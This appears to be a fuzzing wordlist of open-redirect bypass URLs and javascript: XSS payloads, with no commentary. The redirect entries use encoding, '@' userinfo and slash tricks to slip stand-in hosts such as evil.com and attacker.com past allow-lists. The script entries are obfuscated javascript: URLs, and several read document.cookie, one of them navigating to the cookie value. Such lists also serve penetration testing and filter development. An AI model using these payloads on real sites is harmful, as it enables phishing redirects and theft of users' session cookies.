www.allowed.com.evil.com
https://www.allowed.com//evil.com/
https://www.allowed.com%09.evil.com
https://www.allowed.com%252e.evil.com
//evil.com
https:allowed.com
\/\/allowed.com/
/\/allowed.com/
/\allowed.com
//allowed%E3%80%82com
//allowed%00.com
?next=allowed.com&next=evil.com
http://www.allowed.com@evil.com/
http://www.evil.com/http://www.allowed.com/
http://www.evil.com/folder/www.folder.com
";alert(0);//
http://www.allowed.com/redirect.php?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==
https://www.victim.com@attacker.com
https://www.victim.co%6D@attacker.com
https://www.victim.com(\u2044)some(\u2044)path(\u2044)(\u0294)some=param(\uff03)hash@attacker.com
javascript:alert(1)
java%0d%0ascript%0d%0a:alert(0)
javascript://%250Aalert(1)
javascript://%250Aalert(1)//?1
javascript://%250A1?alert(1):0
%09Jav%09ascript:alert(document.domain)
javascript://%250Alert(document.location=document.cookie)
/%09/javascript:alert(1);
/%09/javascript:alert(1)
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
javascript://%0aalert(1)
<>javascript:alert(1);
//javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1);
/javascript:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
javascript:alert(1);
javascript:alert(1)
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascript:confirm(1)
javascript://https://allowed.com/?z=%0Aalert(1)
javascript:prompt(1)
jaVAscript://allowed.com//%0d%0aalert(1);//
javascript://allowed.com?%a0alert%281%29
/x:1/:///%01javascript:alert(document.cookie)/